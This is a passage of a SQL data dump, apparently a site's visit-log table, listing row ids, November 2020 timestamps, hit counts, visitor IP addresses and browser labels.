545746,1604777667,2,2,0,0,'188.191.239.185','chrome'),(545747,1604777712,1,1,0,0,'173.252.95.1','other'),(545748,1604779436,1,1,0,0,'31.13.127.113','other'),(545749,1604780192,1,1,0,0,'91.196.178.47','chrome'),(545750,1604780421,1,1,0,0,'31.13.103.8','other'),(545751,1604781232,1,1,0,0,'31.13.127.20','other'),(545752,1604782999,1,1,0,0,'173.252.95.8','other'),(545753,1604783833,1,1,0,0,'46.211.10.31','chrome'),(545754,1604784708,1,1,0,0,'31.13.127.20','other'),(545755,1604785760,1,1,0,0,'173.252.95.14','other'),(545756,1604787558,1,1,0,0,'31.41.90.250','chrome'),(545757,1604788458,1,1,0,0,'66.220.149.111','other'),(545758,1604789763,1,1,0,0,'31.13.127.120','other'),(545759,1604798419,1,1,0,0,'31.13.103.19','other'),(545760,1604815177,1,1,0,0,'173.252.95.8','other'),(545761,1604816068,1,1,0,0,'173.252.95.13','other'),(545762,1604817129,1,1,0,0,'31.13.127.15','other'),(545763,1604824064,1,1,0,0,'31.13.103.16','other'),(545764,1604827583,1,1,0,0,'173.252.95.21','other'),(545765,1604830074,1,1,0,0,'173.252.95.17','other'),(545766,1604831322,1,1,0,0,'31.13.127.11','other'),(545767,1604835064,1,1,0,0,'31.13.127.11','other'),(545768,1604839890,1,1,0,0,'173.252.127.23','other'),(545769,1604840540,1,1,0,0,'31.13.127.2','other'),(545770,1604844851,3,3,0,0,'176.37.90.125','other'),(545771,1604845626,1,1,0,0,'66.249.66.91','chrome'),(545772,1604847562,1,1,0,0,'31.13.127.14','other'),(545773,1604848423,1,1,0,0,'31.13.127.120','other'),(545774,1604848954,1,1,0,0,'66.249.66.93','chrome'),(545775,1604849945,1,1,0,0,'31.13.127.120','other'),(545776,1604850488,1,1,0,0,'66.249.66.92','chrome'),(545777,1604853610,1,1,0,0,'173.252.95.21','other'),(545778,1604853624,1,1,0,0,'31.13.127.23','other'),(545779,1604857317,1,1,0,0,'31.13.103.15','other'),(545780,1604857502,1,1,0,0,'31.13.127.3','other'),(545781,1604860272,1,1,0,0,'31.13.127.15','other'),(545782,1604860740,1,0,1,0,'66.249.66.91',''),(545783,1604861092,1,1,0,0,'91.196.178.14','chrome'),(545784,1604861335,1,1,0,0,'173.252.95.120','other'),(545785,1604861337,3,3,0,0,'173.252.111.7','other'),(545786,1604861338,1,1,0,0,'173.252.111.21','other'),(545788,1604861339,2,2,0,0,'173.252.111.113','other'),(545789,1604861345,1,1,0,0,'173.252.111.23','other'),(545790,1604861346,1,1,0,0,'173.252.83.117','other'),(545791,1604861347,1,1,0,0,'173.252.107.34','other'),(545792,1604861348,1,1,0,0,'173.252.111.11','other'),(545794,1604861352,1,1,0,0,'173.252.111.116','other'),(545795,1604861353,2,2,0,0,'31.13.127.24','other'),(545796,1604861400,2,2,0,0,'173.252.127.11','other'),(545797,1604861405,2,2,0,0,'69.171.251.10','other'),(545798,1604861417,1,1,0,0,'66.220.149.112','other'),(545799,1604861418,1,1,0,0,'173.252.111.112','other'),(545800,1604861420,1,1,0,0,'69.171.251.20','other'),(545801,1604861426,2,2,0,0,'31.13.127.4','other'),(545804,1604861427,1,1,0,0,'91.196.178.102','chrome'),(545805,1604861432,2,2,0,0,'173.252.127.117','other'),(545807,1604861433,1,1,0,0,'173.252.95.25','other'),(545809,1604861436,1,1,0,0,'69.171.251.12','other'),(545810,1604861440,1,1,0,0,'31.13.103.12','other'),(545811,1604861444,1,1,0,0,'37.47.17.36','chrome'),(545812,1604861447,1,1,0,0,'91.196.178.39','chrome'),(545813,1604861448,1,1,0,0,'69.171.251.118','other'),(545814,1604861458,2,2,0,0,'69.171.251.26','other'),(545815,1604861477,1,1,0,0,'69.171.251.5','other'),(545816,1604861480,1,1,0,0,'130.180.210.3','chrome'),(545817,1604861482,1,1,0,0,'178.133.204.83','chrome'),(545818,1604861483,2,2,0,0,'173.252.95.2','other'),(545819,1604861485,1,1,0,0,'46.211.85.73','chrome'),(545821,1604861496,1,1,0,0,'31.13.127.117','other'),(545822,1604861497,1,1,0,0,'173.252.111.16','other'),(545823,1604861499,4,4,0,0,'66.220.149.10','other'),(545824,1604861505,3,3,0,0,'91.196.178.10','firefox'),(545825,1604861514,1,1,0,0,'173.252.127.19','other'),(545826,1604861516,1,1,0,0,'66.220.149.24','other'),(545827,1604861517,1,1,0,0,'185.237.217.9','chrome'),(545828,1604861525,1,1,0,0,'185.16.119.78','chrome'),(545829,1604861526,1,1,0,0,'46.211.21.16','chrome'),(545830,1604861529,1,1,0,0,'83.171.233.134','chrome'),(545831,1604861535,1,1,0,0,'173.252.95.5','other'),(545832,1604861536,1,1,0,0,'173.252.95.22','other'),(545833,1604861541,1,1,0,0,'91.196.178.174','chrome'),(545834,1604861545,1,1,0,0,'31.13.127.23','other'),(545835,1604861548,1,1,0,0,'37.73.155.254','chrome'),(545836,1604861552,1,1,0,0,'31.13.127.7','other'),(545837,1604861558,1,1,0,0,'91.196.178.61','chrome'),(545838,1604861561,1,1,0,0,'91.196.178.187','chrome'),(545839,1604861564,1,1,0,0,'91.196.178.52','chrome'),(545840,1604861568,1,1,0,0,'31.13.103.8','other'),(545841,1604861569,1,1,0,0,'95.134.203.36','chrome'),(545842,1604861572,1,1,0,0,'66.220.149.17','other'),(545843,1604861574,1,1,0,0,'173.252.127.26','other'),(545845,1604861576,2,2,0,0,'69.171.251.116','other'),(545846,1604861579,1,1,0,0,'66.220.149.30','other'),(545848,1604861587,1,1,0,0,'66.220.149.119','other'),(545849,1604861588,1,1,0,0,'91.196.178.148','chrome'),(545850,1604861592,1,1,0,0,'173.252.127.31','other'),(545852,1604861610,1,1,0,0,'91.196.178.15','chrome'),(545853,1604861620,1,1,0,0,'31.13.127.3','other'),(545854,1604861621,1,1,0,0,'69.171.251.1','other'),(545855,1604861643,3,3,0,0,'69.171.251.2','other'),(545856,1604861654,1,1,0,0,'69.171.251.8','other'),(545857,1604861659,1,1,0,0,'46.133.207.196','chrome'),(545858,1604861660,1,1,0,0,'69.171.251.17','other'),(545860,1604861661,1,1,0,0,'185.237.217.26','chrome'),(545861,1604861666,1,1,0,0,'185.237.217.30','chrome'),(545862,1604861668,1,1,0,0,'173.252.127.119','other'),(545863,1604861673,1,1,0,0,'31.13.103.7','other'),(545864,1604861677,1,1,0,0,'185.237.217.28','chrome'),(545865,1604861685,1,1,0,0,'91.196.178.172','chrome'),(545866,1604861688,1,1,0,0,'95.132.51.155','chrome'),(545867,1604861694,1,1,0,0,'69.171.251.24','other'),(545868,1604861699,1,1,0,0,'69.171.251.19','other'),(545869,1604861706,1,1,0,0,'31.13.103.111','other'),(545870,1604861719,1,1,0,0,'91.196.178.65','chrome'),(545871,1604861733,1,1,0,0,'66.220.149.111','other'),(545872,1604861734,1,1,0,0,'31.13.127.118','other'),(545873,1604861742,1,1,0,0,'91.196.178.36','chrome'),(545874,1604861750,1,1,0,0,'31.13.127.19','other'),(545875,1604861762,1,1,0,0,'91.196.178.62','chrome'),(545876,1604861771,1,1,0,0,'91.196.178.58','chrome'),(545877,1604861778,1,1,0,0,'173.252.127.116','other'),(545878,1604861787,1,1,0,0,'178.95.67.114','chrome'),(545879,1604861791,1,1,0,0,'173.252.95.113','other'),(545880,1604861802,1,1,0,0,'91.196.178.1','chrome'),(545881,1604861812,1,1,0,0,'173.252.127.35','other'),(545882,1604861814,1,1,0,0,'91.196.178.162','chrome'),(545883,1604861826,1,1,0,0,'69.171.251.111','other'),(545884,1604861827,3,3,0,0,'91.196.178.24','chrome'),(545885,1604861831,1,1,0,0,'91.196.178.132','chrome'),(545886,1604861841,1,1,0,0,'173.252.127.21','other'),(545887,1604861909,1,1,0,0,'173.252.95.111','other'),(545888,1604861939,2,2,0,0,'91.196.178.186','chrome'),(545889,1604861951,1,1,0,0,'46.211.41.228','chrome'),(545890,1604861955,1,1,0,0,'91.196.121.134','chrome'),(545891,1604861960,1,1,0,0,'69.171.251.22','other'),(545892,1604862011,2,2,0,0,'91.196.178.14','chrome'),(545893,1604862024,1,1,0,0,'69.171.251.23','other'),(545894,1604862036,2,2,0,0,'69.171.251.25','other'),(545897,1604862044,1,1,0,0,'91.196.178.25','other'),(545898,1604862081,1,1,0,0,'66.220.149.32','other'),(545899,1604862156,1,1,0,0,'185.204.24.6','other'),(545900,1604862173,1,1,0,0,'173.252.127.36','other'),(545901,1604862207,1,1,0,0,'91.196.178.168','chrome'),(545902,1604862210,1,1,0,0,'37.73.82.73','chrome'),(545903,1604862269,1,1,0,0,'91.196.178.104','chrome'),(545904,1604862319,2,2,0,0,'69.171.251.15','other'),(545905,1604862323,1,1,0,0,'173.252.127.27','other'),(545906,1604862325,1,1,0,0,'173.252.111.12','other'),(545907,1604862329,2,2,0,0,'66.220.149.25','other'),(545908,1604862334,1,1,0,0,'91.196.178.10','chrome'),(545909,1604862384,1,1,0,0,'173.252.111.10','other'),(545910,1604862385,1,1,0,0,'91.196.178.107','chrome'),(545911,1604862435,1,1,0,0,'69.171.251.12','other'),(545912,1604862469,1,1,0,0,'173.252.95.13','other'),(545913,1604862474,1,1,0,0,'31.13.103.13','other'),(545914,1604862482,1,1,0,0,'37.73.162.43','chrome'),(545915,1604862498,1,1,0,0,'84.143.158.167','chrome'),(545916,1604862534,1,1,0,0,'173.252.127.24','other'),(545917,1604862546,1,1,0,0,'31.13.103.2','other'),(545918,1604862555,1,1,0,0,'94.153.71.241','chrome'),(545919,1604862595,2,2,0,0,'173.252.127.17','other'),(545920,1604862599,1,1,0,0,'31.13.127.3','other'),(545921,1604862600,2,2,0,0,'31.13.127.5','other'),(545922,1604862607,1,1,0,0,'37.55.226.231','chrome'),(545923,1604862608,1,1,0,0,'31.13.127.16','other'),(545924,1604862613,1,1,0,0,'95.133.193.139','chrome'),(545925,1604862663,1,1,0,0,'173.252.127.12','other'),(545926,1604862682,1,1,0,0,'69.171.251.16','other'),(545927,1604862684,1,1,0,0,'69.171.251.2','other'),(545928,1604862689,1,1,0,0,'173.252.107.111','other'),(545929,1604862695,1,1,0,0,'69.171.251.5','other'),(545930,1604862724,1,1,0,0,'46.133.140.251','other'),(545931,1604862732,1,1,0,0,'46.133.207.196','chrome'),(545932,1604862745,2,2,0,0,'66.220.149.1','other'),(545933,1604862753,1,1,0,0,'46.211.44.20','chrome'),(545934,1604862758,1,1,0,0,'69.171.251.17','other'),(545935,1604862765,1,1,0,0,'31.13.103.7','other'),(545936,1604862786,1,1,0,0,'173.252.95.25','other'),(545937,1604862787,1,1,0,0,'173.252.127.6','other'),(545938,1604862795,1,1,0,0,'31.13.127.9','other'),(545939,1604862796,1,1,0,0,'31.13.127.117','other'),(545940,1604862827,1,1,0,0,'69.171.251.119','other'),(545941,1604862828,1,1,0,0,'69.171.251.24','other'),(545942,1604862834,1,1,0,0,'31.13.103.23','other'),(545943,1604862846,1,1,0,0,'173.252.127.34','other'),(545944,1604862912,1,1,0,0,'66.220.149.39','other'),(545945,1604862918,1,1,0,0,'173.252.127.21','other'),(545946,1604862930,1,1,0,0,'173.252.95.26','other'),(545947,1604862934,1,1,0,0,'66.220.149.118','other'),(545948,1604862937,1,1,0,0,'173.252.111.120','other'),(545949,1604862939,1,1,0,0,'173.252.127.32','other'),(545950,1604862948,1,1,0,0,'173.252.127.25','other'),(545951,1604862951,1,1,0,0,'91.196.178.41','chrome'),(545952,1604863019,1,1,0,0,'173.252.127.5','other'),(545953,1604863035,1,1,0,0,'185.138.228.227','chrome'),(545954,1604863053,1,1,0,0,'46.211.26.148','chrome'),(545955,1604863072,1,1,0,0,'69.171.251.112','other'),(545956,1604863089,1,1,0,0,'91.196.178.153','chrome'),(545957,1604863104,2,2,0,0,'69.171.251.22','other'),(545958,1604863123,1,1,0,0,'69.171.251.25','other'),(545959,1604863189,1,1,0,0,'173.252.127.117','other'),(545960,1604863193,1,1,0,0,'69.171.251.116','other'),(545961,1604863223,1,1,0,0,'66.220.149.33','other'),(545962,1604863239,1,1,0,0,'69.171.251.20','other'),(545963,1604863259,1,1,0,0,'173.252.127.4','other'),(545964,1604863290,1,1,0,0,'173.252.107.3','other'),(545965,1604863313,1,1,0,0,'91.196.178.57','chrome'),(545966,1604863334,3,3,0,0,'91.196.178.14','chrome'),(545967,1604863381,2,2,0,0,'173.252.127.10','other'),(545968,1604863401,1,1,0,0,'173.252.95.22','other'),(545969,1604863412,1,1,0,0,'37.73.162.43','chrome'),(545970,1604863425,1,1,0,0,'66.220.149.24','other'),(545971,1604863427,1,1,0,0,'173.252.127.116','other'),(545972,1604863444,1,1,0,0,'69.171.251.1','other'),(545973,1604863457,1,1,0,0,'91.196.178.168','chrome'),(545974,1604863496,1,1,0,0,'69.171.251.118','other'),(545975,1604863501,1,1,0,0,'173.252.111.7','other'),(545976,1604863506,2,2,0,0,'173.252.95.13','other'),(545977,1604863586,1,1,0,0,'69.171.251.14','other'),(545978,1604863731,1,1,0,0,'66.220.149.21','other'),(545979,1604863748,1,1,0,0,'91.196.177.219','other'),(545980,1604863778,1,1,0,0,'91.196.178.11','chrome'),(545981,1604863827,1,1,0,0,'69.171.251.24','other'),(545982,1604863840,1,1,0,0,'91.196.178.125','chrome'),(545983,1604863869,1,1,0,0,'94.153.31.104','chrome'),(545984,1604863893,1,1,0,0,'173.252.95.111','other'),(545985,1604863905,1,1,0,0,'66.220.149.120','other'),(545986,1604863909,1,1,0,0,'173.252.127.29','other'),(545987,1604863930,1,1,0,0,'173.252.127.17','other'),(545988,1604863947,1,1,0,0,'31.13.127.120','other'),(545990,1604863957,1,1,0,0,'69.171.251.5','other'),(545991,1604863967,1,1,0,0,'46.211.79.85','chrome'),(545992,1604863999,1,1,0,0,'95.132.7.40','chrome'),(545993,1604864027,1,1,0,0,'66.220.149.15','other'),(545994,1604864043,1,1,0,0,'173.252.127.33','other'),(545995,1604864059,1,1,0,0,'31.13.103.113','other'),(545996,1604864102,1,1,0,0,'91.196.178.41','other'),(545997,1604864121,1,1,0,0,'94.153.12.148','chrome'),(545998,1604864171,1,1,0,0,'69.171.251.4','other'),(545999,1604864202,1,1,0,0,'66.220.149.35','other'),(546001,1604864221,1,1,0,0,'173.252.127.8','other'),(546002,1604864247,1,1,0,0,'173.252.127.27','other'),(546003,1604864269,1,1,0,0,'185.237.217.12','chrome'),(546005,1604864270,1,1,0,0,'91.196.176.13','chrome'),(546006,1604864290,1,1,0,0,'31.13.103.22','other'),(546007,1604864293,2,2,0,0,'69.171.251.12','other'),(546008,1604864294,1,1,0,0,'69.171.251.117','other'),(546009,1604864308,1,1,0,0,'46.211.18.93','chrome'),(546010,1604864338,1,1,0,0,'193.108.51.254','other'),(546011,1604864371,1,1,0,0,'173.252.127.30','other'),(546012,1604864404,1,1,0,0,'69.171.251.6','other'),(546013,1604864430,1,1,0,0,'66.220.149.113','other'),(546014,1604864440,1,1,0,0,'173.252.127.26','other'),(546015,1604864514,2,2,0,0,'66.220.149.116','other'),(546016,1604864542,1,1,0,0,'91.196.178.58','chrome'),(546017,1604864584,1,1,0,0,'31.13.127.11','other'),(546018,1604864610,1,1,0,0,'91.196.178.165','chrome'),(546019,1604864767,1,1,0,0,'173.252.127.24','other'),(546020,1604864781,1,1,0,0,'69.171.251.17','other'),(546021,1604864872,1,1,0,0,'185.237.217.19','chrome'),(546022,1604864923,1,1,0,0,'173.252.111.120','other'),(546023,1604864932,1,1,0,0,'173.252.95.27','other'),(546024,1604864964,1,1,0,0,'31.13.127.111','other'),(546025,1604864971,1,1,0,0,'69.171.251.118','other'),(546026,1604865001,1,1,0,0,'91.196.178.186','chrome'),(546027,1604865011,1,1,0,0,'94.153.14.20','other'),(546028,1604865022,1,1,0,0,'69.171.251.112','other'),(546029,1604865024,1,1,0,0,'173.252.127.12','other'),(546030,1604865031,1,1,0,0,'91.196.178.178','chrome'),(546031,1604865039,1,1,0,0,'69.171.251.9','other'),(546032,1604865089,1,1,0,0,'31.13.103.5','other'),(546033,1604865147,1,1,0,0,'66.220.149.16','other'),(546034,1604865160,1,1,0,0,'173.252.111.2','other'),(546035,1604865162,1,1,0,0,'66.220.149.120','other'),(546036,1604865209,1,1,0,0,'173.252.107.119','other'),(546037,1604865212,1,1,0,0,'94.153.6.92','chrome'),(546038,1604865213,1,1,0,0,'173.252.127.23','other'),(546039,1604865237,1,1,0,0,'31.13.103.12','other'),(546040,1604865258,1,1,0,0,'69.171.251.116','other'),(546041,1604865275,1,1,0,0,'173.252.127.16','other'),(546042,1604865323,1,1,0,0,'31.13.127.9','other'),(546043,1604865339,1,1,0,0,'46.211.22.79','chrome'),(546044,1604865391,1,1,0,0,'173.252.95.22','other'),(546045,1604865483,1,1,0,0,'66.220.149.31','other'),(546046,1604865549,2,2,0,0,'31.13.127.112','other'),(546047,1604865599,1,1,0,0,'173.252.127.17','other'),(546048,1604865603,1,1,0,0,'69.171.251.15','other'),(546049,1604865626,1,1,0,0,'69.171.249.5','other'),(546050,1604865635,1,1,0,0,'91.196.178.147','chrome'),(546051,1604865654,1,1,0,0,'185.237.217.14','chrome'),(546052,1604865659,1,1,0,0,'66.220.149.38','other'),(546053,1604865673,1,1,0,0,'93.73.148.158','chrome'),(546054,1604865675,1,1,0,0,'173.252.127.24','other'),(546055,1604865697,1,1,0,0,'46.211.34.92','other'),(546056,1604865745,1,1,0,0,'185.237.217.9','chrome'),(546057,1604865789,1,1,0,0,'69.171.251.120','other'),(546058,1604865820,1,1,0,0,'95.132.43.132','other'),(546059,1604865842,1,1,0,0,'69.171.251.14','other'),(546060,1604865843,1,1,0,0,'173.252.107.14','other'),(546061,1604865851,1,1,0,0,'91.196.178.154','chrome'),(546062,1604865889,1,1,0,0,'66.220.149.2','other'),(546063,1604865933,1,1,0,0,'91.196.178.93','chrome'),(546064,1604865991,1,1,0,0,'66.220.149.112','other'),(546065,1604866000,1,1,0,0,'173.252.111.4','other'),(546066,1604866019,1,1,0,0,'94.153.67.97','chrome'),(546067,1604866049,1,1,0,0,'173.252.95.113','other'),(546068,1604866117,1,1,0,0,'173.252.127.31','other'),(546069,1604866134,1,1,0,0,'173.252.127.120','other'),(546070,1604866141,1,1,0,0,'173.252.95.20','other'),(546071,1604866146,1,1,0,0,'185.237.217.30','chrome'),(546072,1604866147,1,1,0,0,'91.196.177.73','other'),(546073,1604866149,1,1,0,0,'69.171.251.12','other'),(546074,1604866168,1,1,0,0,'91.196.178.189','chrome'),(546075,1604866170,1,1,0,0,'66.220.149.11','other'),(546076,1604866191,1,1,0,0,'91.196.178.11','other'),(546077,1604866227,1,1,0,0,'178.92.251.87','chrome'),(546078,1604866307,1,1,0,0,'173.252.95.23','other'),(546079,1604866349,2,2,0,0,'69.171.251.22','other'),(546080,1604866355,1,1,0,0,'185.237.217.23','chrome'),(546081,1604866385,1,1,0,0,'66.220.149.29','other'),(546082,1604866409,1,1,0,0,'66.220.149.28','other'),(546083,1604866447,1,1,0,0,'69.171.251.113','other'),(546084,1604866459,1,1,0,0,'69.171.251.6','other'),(546085,1604866475,1,1,0,0,'95.133.193.69','chrome'),(546086,1604866522,1,1,0,0,'69.171.251.15','other'),(546087,1604866554,1,1,0,0,'31.13.103.120','other'),(546088,1604866564,1,1,0,0,'66.220.149.1','other'),(546089,1604866573,1,1,0,0,'173.252.127.112','other'),(546090,1604866604,1,1,0,0,'92.113.188.244','chrome'),(546091,1604866636,1,1,0,0,'31.13.127.9','other'),(546092,1604866686,1,1,0,0,'173.252.107.112','other'),(546093,1604866726,1,1,0,0,'173.252.127.118','other'),(546094,1604866736,1,1,0,0,'31.13.127.19','other'),(546095,1604866741,1,1,0,0,'31.13.103.2','other'),(546096,1604866742,1,1,0,0,'173.252.95.4','other'),(546097,1604866775,1,1,0,0,'91.196.178.45','chrome'),(546098,1604866893,1,1,0,0,'37.73.185.197','chrome'),(546099,1604866942,1,1,0,0,'69.171.251.13','other'),(546100,1604867056,1,1,0,0,'69.171.251.117','other'),(546101,1604867057,1,1,0,0,'66.220.149.21','other'),(546102,1604867058,2,2,0,0,'69.171.251.118','other'),(546103,1604867066,1,1,0,0,'66.220.149.6','other'),(546104,1604867094,1,1,0,0,'91.196.177.21','chrome'),(546105,1604867105,1,1,0,0,'91.196.178.141','chrome'),(546106,1604867138,1,1,0,0,'173.252.127.22','other'),(546107,1604867139,1,1,0,0,'31.13.103.8','other'),(546108,1604867153,1,1,0,0,'94.153.5.117','chrome'),(546109,1604867171,1,1,0,0,'185.237.217.10','chrome'),(546110,1604867175,2,2,0,0,'69.171.251.17','other'),(546111,1604867189,1,1,0,0,'66.220.149.116','other'),(546112,1604867216,1,1,0,0,'66.220.149.33','other'),(546113,1604867235,1,1,0,0,'91.196.178.67','chrome'),(546114,1604867256,1,1,0,0,'91.196.178.9','chrome'),(546115,1604867278,1,1,0,0,'91.196.178.14','chrome'),(546116,1604867291,1,1,0,0,'66.220.149.36','other'),(546117,1604867327,1,1,0,0,'69.171.251.20','other'),(546118,1604867360,1,1,0,0,'185.237.217.12','chrome'),(546119,1604867371,1,1,0,0,'185.237.217.29','chrome'),(546120,1604867397,1,1,0,0,'173.252.127.21','other'),(546121,1604867400,1,1,0,0,'31.13.127.23','other'),(546122,1604867402,1,1,0,0,'31.13.103.118','other'),(546123,1604867427,1,1,0,0,'173.252.127.29','other'),(546124,1604867434,1,1,0,0,'173.252.127.120','other'),(546125,1604867437,2,2,0,0,'69.171.251.15','other'),(546126,1604867444,1,1,0,0,'91.196.178.186','chrome'),(546127,1604867502,1,1,0,0,'173.252.95.9','other'),(546128,1604867596,2,2,0,0,'31.13.127.9','other'),(546129,1604867613,1,1,0,0,'91.196.178.53','chrome'),(546130,1604867617,1,1,0,0,'66.220.149.38','other'),(546131,1604867630,1,1,0,0,'91.196.178.179','chrome'),(546132,1604867700,1,1,0,0,'66.220.149.13','other'),(546133,1604867725,1,1,0,0,'185.204.24.6','other'),(546134,1604867781,1,1,0,0,'173.252.95.16','other'),(546135,1604867825,1,1,0,0,'195.10.210.210','chrome'),(546136,1604867828,1,1,0,0,'173.252.127.2','other'),(546137,1604867844,1,1,0,0,'91.196.178.132','chrome'),(546138,1604867888,1,1,0,0,'185.237.217.23','chrome'),(546139,1604867925,1,1,0,0,'88.155.10.9','chrome'),(546140,1604867936,1,1,0,0,'31.13.127.14','other'),(546141,1604868002,1,1,0,0,'69.171.251.111','other'),(546142,1604868029,1,1,0,0,'91.196.176.32','chrome'),(546143,1604868174,1,1,0,0,'31.13.127.117','other'),(546144,1604868233,1,1,0,0,'66.220.149.27','other'),(546145,1604868324,1,1,0,0,'69.171.251.117','other'),(546146,1604868347,1,1,0,0,'66.220.149.117','other'),(546147,1604868416,1,1,0,0,'69.171.251.11','other'),(546148,1604868447,1,1,0,0,'91.196.178.189','chrome'),(546149,1604868454,1,1,0,0,'173.252.95.8','other'),(546150,1604868473,1,1,0,0,'69.171.251.5','other'),(546151,1604868481,1,1,0,0,'91.196.176.34','chrome'),(546152,1604868506,1,1,0,0,'37.54.16.171','chrome'),(546153,1604868627,1,1,0,0,'173.252.127.3','other'),(546154,1604868664,1,1,0,0,'91.196.178.103','chrome'),(546155,1604868687,1,1,0,0,'66.220.149.3','other'),(546156,1604868698,1,1,0,0,'94.153.35.130','chrome'),(546157,1604868731,1,1,0,0,'69.171.251.113','other'),(546158,1604868753,1,1,0,0,'69.171.251.17','other'),(546159,1604868805,2,2,0,0,'91.196.176.34','other'),(546160,1604868820,1,1,0,0,'176.106.217.144','other'),(546161,1604868843,1,1,0,0,'66.220.149.21','other'),(546162,1604868857,1,1,0,0,'31.13.127.1','other'),(546163,1604868881,1,1,0,0,'88.155.76.117','chrome'),(546164,1604868894,1,1,0,0,'173.252.95.112','other'),(546165,1604868901,1,1,0,0,'46.211.0.245','other'),(546166,1604868908,1,1,0,0,'91.196.178.171','chrome'),(546167,1604868918,1,1,0,0,'69.171.249.120','other'),(546168,1604868936,1,1,0,0,'66.220.149.13','other'),(546169,1604868940,1,1,0,0,'66.220.149.30','other'),(546170,1604868977,1,1,0,0,'66.220.149.111','other'),(546171,1604869090,1,1,0,0,'69.171.251.22','other'),(546172,1604869179,1,1,0,0,'173.252.127.2','other'),(546173,1604869263,1,1,0,0,'69.171.251.117','other'),(546174,1604869267,1,1,0,0,'69.171.251.6','other'),(546175,1604869291,1,1,0,0,'91.196.178.47','chrome'),(546176,1604869292,1,1,0,0,'185.237.217.25','other'),(546177,1604869306,1,1,0,0,'173.252.127.6','other'),(546178,1604869372,2,2,0,0,'173.252.127.22','other'),(546179,1604869380,2,2,0,0,'66.220.149.5','other'),(546180,1604869396,1,1,0,0,'69.171.251.14','other'),(546181,1604869434,1,1,0,0,'69.171.251.10','other'),(546182,1604869436,1,1,0,0,'31.13.127.111','other'),(546183,1604869442,1,1,0,0,'86.49.247.221','chrome'),(546184,1604869496,1,1,0,0,'91.196.178.14','chrome'),(546185,1604869538,1,1,0,0,'69.171.251.24','other'),(546186,1604869625,1,1,0,0,'173.252.95.13','other'),(546187,1604869657,1,1,0,0,'69.171.251.11','other'),(546188,1604869716,1,1,0,0,'173.252.127.23','other'),(546189,1604869752,1,1,0,0,'185.237.217.14','chrome'),(546190,1604869826,1,1,0,0,'69.171.251.19','other'),(546191,1604869827,1,1,0,0,'31.13.127.22','other'),(546192,1604869897,1,1,0,0,'69.171.251.1','other'),(546193,1604869994,1,1,0,0,'213.192.19.34','chrome'),(546194,1604870024,1,1,0,0,'37.73.152.51','chrome'),(546195,1604870042,1,1,0,0,'69.171.251.16','other'),(546196,1604870059,1,1,0,0,'88.155.150.140','other'),(546197,1604870080,1,1,0,0,'173.252.127.24','other'),(546198,1604870085,1,1,0,0,'69.171.251.3','other'),(546199,1604870138,1,1,0,0,'91.196.178.166','chrome'),(546200,1604870170,1,1,0,0,'31.13.127.2','other'),(546201,1604870200,1,1,0,0,'69.171.251.4','other'),(546202,1604870206,1,1,0,0,'31.13.127.4','other'),(546203,1604870211,1,1,0,0,'66.220.149.2','other'),(546204,1604870228,1,1,0,0,'91.196.178.35','chrome'),(546205,1604870266,1,1,0,0,'66.220.149.7','other'),(546206,1604870286,1,1,0,0,'91.196.178.174','chrome'),(546207,1604870402,1,1,0,0,'66.220.149.29','other'),(546208,1604870487,1,1,0,0,'173.252.111.23','other'),(546209,1604870499,1,1,0,0,'66.220.149.25','other'),(546211,1604870500,1,1,0,0,'173.252.127.25','other'),(546212,1604870565,1,1,0,0,'173.252.127.33','other'),(546213,1604870566,1,1,0,0,'173.252.127.15','other'),(546214,1604870573,1,1,0,0,'66.220.149.9','other'),(546215,1604870590,1,1,0,0,'91.196.178.165','chrome'),(546216,1604870772,1,1,0,0,'91.196.178.149','chrome'),(546217,1604870776,1,1,0,0,'69.171.251.7','other'),(546218,1604870823,1,1,0,0,'173.252.127.16','other'),(546219,1604870829,1,1,0,0,'69.171.251.14','other'),(546220,1604870886,1,1,0,0,'69.171.251.112','other'),(546221,1604870937,1,1,0,0,'69.171.251.18','other'),(546222,1604871066,2,2,0,0,'173.252.127.5','other'),(546223,1604871069,1,1,0,0,'93.72.120.150','chrome'),(546224,1604871133,1,1,0,0,'69.171.251.117','other'),(546225,1604871134,1,1,0,0,'69.171.251.119','other'),(546226,1604871141,1,1,0,0,'91.196.178.87','chrome'),(546227,1604871156,1,1,0,0,'46.211.29.55','chrome'),(546228,1604871161,1,1,0,0,'69.171.251.10','other'),(546229,1604871172,1,1,0,0,'31.13.127.20','other'),(546230,1604871192,1,1,0,0,'31.13.103.111','other'),(546231,1604871193,1,1,0,0,'66.220.149.37','other'),(546232,1604871199,1,1,0,0,'91.196.177.30','chrome'),(546233,1604871226,1,1,0,0,'91.196.178.34','chrome'),(546234,1604871317,1,1,0,0,'91.196.178.180','chrome'),(546235,1604871356,1,1,0,0,'173.252.95.120','other'),(546236,1604871581,1,1,0,0,'173.252.127.29','other'),(546237,1604871609,1,1,0,0,'173.252.127.26','other'),(546238,1604871698,1,1,0,0,'91.196.178.75','chrome'),(546239,1604871703,1,1,0,0,'91.196.178.121','other'),(546240,1604871711,1,1,0,0,'46.211.9.213','chrome'),(546241,1604871743,1,1,0,0,'185.237.217.30','chrome'),(546243,1604871803,1,1,0,0,'69.171.251.16','other'),(546244,1604871830,1,1,0,0,'91.196.178.53','chrome'),(546245,1604871844,1,1,0,0,'69.171.251.11','other'),(546246,1604871873,1,1,0,0,'69.171.251.120','other'),(546247,1604871941,1,1,0,0,'66.220.149.112','other'),(546248,1604872076,1,1,0,0,'31.13.127.18','other'),(546250,1604872110,1,1,0,0,'31.13.127.117','other'),(546251,1604872286,1,1,0,0,'173.252.127.113','other'),(546252,1604872359,1,1,0,0,'173.252.127.14','other'),(546254,1604872373,1,1,0,0,'173.252.127.5','other'),(546255,1604872521,1,1,0,0,'69.171.251.117','other'),(546256,1604872596,1,1,0,0,'66.220.149.7','other'),(546257,1604872794,1,1,0,0,'91.196.178.34','chrome'),(546258,1604872818,2,2,0,0,'66.220.149.8','other'),(546259,1604872829,1,1,0,0,'69.171.249.119','other'),(546260,1604872886,2,2,0,0,'31.13.127.23','other'),(546261,1604872911,1,1,0,0,'69.171.251.111','other'),(546262,1604873139,1,1,0,0,'69.171.251.119','other'),(546263,1604873142,1,1,0,0,'31.13.103.8','other'),(546264,1604873146,1,1,0,0,'66.220.149.11','other'),(546265,1604873154,1,1,0,0,'37.73.8.112','chrome'),(546266,1604873356,1,1,0,0,'173.252.127.119','other'),(546267,1604873412,1,1,0,0,'69.171.251.19','other'),(546268,1604873421,1,1,0,0,'128.124.160.53','chrome'),(546269,1604873429,1,1,0,0,'173.252.127.9','other'),(546270,1604873478,1,1,0,0,'91.196.178.92','chrome'),(546271,1604873519,1,1,0,0,'69.171.251.7','other'),(546272,1604873636,1,1,0,0,'66.220.149.30','other'),(546273,16048736